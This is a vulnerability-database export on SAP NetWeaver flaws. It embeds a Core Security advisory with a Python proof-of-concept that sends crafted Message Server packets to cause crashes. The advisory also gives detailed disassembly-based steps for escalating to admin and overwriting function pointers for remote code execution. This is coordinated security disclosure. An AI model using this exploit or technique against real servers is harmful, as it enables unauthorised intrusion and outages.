"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003325"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-003325"
},
{
"db": "NVD",
"id": "CVE-2011-4707"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://dsecrg.com/pages/vul/show.php?id=336"
},
{
"trust": 1.7,
"url": "https://service.sap.com/sap/support/notes/1546307"
},
{
"trust": 1.7,
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/520554/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://erpscan.io/advisories/dsecrg-11-036-sap-netwaver-virus-scan-interface-multiple-xss/"
},
{
"trust": 0.9,
"url": "http://dsecrg.com/pages/vul/show.php?id=341"
},
{
"trust": 0.9,
"url": "http://dsecrg.com/pages/vul/show.php?id=335"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4707"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4707"
},
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=340http"
},
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=339http"
},
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=336http"
},
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=338http"
},
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=337http"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/520554/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/dsecrg-11-036-sap-netwaver-virus-scan-interface-multiple-xss/"
},
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=337"
},
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=339"
},
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=340"
},
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=338"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.securityfocus.com/bid/50680"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"db": "VULMON",
"id": "CVE-2011-4707"
},
{
"db": "BID",
"id": "50680"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003325"
},
{
"db": "CNNVD",
"id": "CNNVD-201112-122"
},
{
"db": "NVD",
"id": "CVE-2011-4707"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"db": "VULMON",
"id": "CVE-2011-4707"
},
{
"db": "BID",
"id": "50680"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003325"
},
{
"db": "CNNVD",
"id": "CNNVD-201112-122"
},
{
"db": "NVD",
"id": "CVE-2011-4707"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-11-16T00:00:00",
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"date": "2011-11-16T00:00:00",
"db": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
},
{
"date": "2011-11-16T00:00:00",
"db": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
},
{
"date": "2011-11-16T00:00:00",
"db": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
},
{
"date": "2011-11-16T00:00:00",
"db": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
},
{
"date": "2011-11-16T00:00:00",
"db": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
},
{
"date": "2011-11-16T00:00:00",
"db": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"date": "2011-12-08T00:00:00",
"db": "VULMON",
"id": "CVE-2011-4707"
},
{
"date": "2011-11-15T00:00:00",
"db": "BID",
"id": "50680"
},
{
"date": "2011-12-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003325"
},
{
"date": "2011-12-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201112-122"
},
{
"date": "2011-12-08T19:55:03.720000",
"db": "NVD",
"id": "CVE-2011-4707"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"date": "2018-12-10T00:00:00",
"db": "VULMON",
"id": "CVE-2011-4707"
},
{
"date": "2013-02-14T12:21:00",
"db": "BID",
"id": "50680"
},
{
"date": "2011-12-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003325"
},
{
"date": "2011-12-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201112-122"
},
{
"date": "2018-12-10T19:29:00.420000",
"db": "NVD",
"id": "CVE-2011-4707"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201112-122"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Cross-Site Request Forgery Vulnerability",
"sources": [
{
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-4916"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting",
"sources": [
{
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
}
],
"trust": 1.4
}
}
VAR-202001-0833
Vulnerability from variot - Updated: 2024-07-23 22:37A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN. SAP NetWeaver Contains an array index validation vulnerability.Denial of service operation (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
CORE-2012-1128
- Advisory Information
Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release
- Vulnerability Information
Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593
-
By sending different messages, the different vulnerabilities can be triggered.
-
Vulnerable packages
. Older versions are probably affected too, but they were not checked.
- Non-vulnerable packages
. Vendor did not provide this information.
- Vendor Information, Solutions and Workarounds
SAP released the security note 1800603 [2] regarding these issues.
- Credits
Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.
- Technical Description / Proof of Concept Code
The following python script is the main PoC that can be used to reproduce all vulnerabilities described below:
/----- import socket, struct from optparse import OptionParser
Parse the target options
parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args()
client_string = '-'+' '39 server_name = '-'+' '39
def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet)
def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data)
def initialize_connection(hostname, port):
# Connect
print "[*] Connecting to", hostname, "port", port
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((hostname, port))
# Send initialization packet
print "[*] Conected, sending login request"
init = '**MESSAGE**\x00' # eyecatcher
init+= '\x04' # version
init+= '\x00' # errorno
init+= client_string # toname
init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' #
msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init)
# Receive response
print "[*] Receiving login reply"
(length, data) = receive(connection)
# Parsing login reply
server_name = data[4+64:4+64+40]
return connection
Main PoC body
connection = initialize_connection(options.hostname, options.port) send_attack(connection)
-----/
In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities.
8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module.
The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows:
/----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT':
/----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ...
-----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function:
/----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax8] lea esi, j2ee_stat_services.totalMsgCount[esi8] ;using the index without validating array bounds
-----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct:
/----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends
-----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below:
/----- At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1
.text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ;
.text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ;
.text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ;
.text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ;
.text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx
[...]
-----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives:
/----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8]
-----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server.
A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below:
/----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends
-----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client:
/----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed
-----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0':
/----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r
-----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0':
/----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ...
-----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server.
After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation:
- Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections.
- Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server.
8.1.1. Gaining remote code execution by overwriting function pointers
Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet.
One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters:
/----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]
; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER
; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost>
[...]
-----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set').
After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function:
/----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi*2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer
-----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array.
8.1.2. Modify the configuration and behavior of the server
After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps:
- Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'.
- Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number).
The following python code can be used to trigger the vulnerability:
/----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE*\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd
crash+=
"ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash)
print "[*] Crash sent !"
-----/
8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module.
The following python code can be used to trigger the vulnerability:
/----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE*\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd
crash+= "AD-EYECATCH\x00"
crash+= "\x01\x01"
crash+= "%11d" % 104
crash+= "%11d" % 1
crash+= "\x15\x00\x00\x00"
crash+= "\x20\x00\x00\xc8"
crash+= "LALA" + ' '*(20-4)
crash+= "LOLO" + ' '*(40-4)
crash+= " "*36
send_packet(connection, crash)
print "[*] Crash sent !"
-----/
- Report Timeline . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd,
-
2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published.
-
References
[1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm.
[4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm.
[5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/.
- About CoreLabs
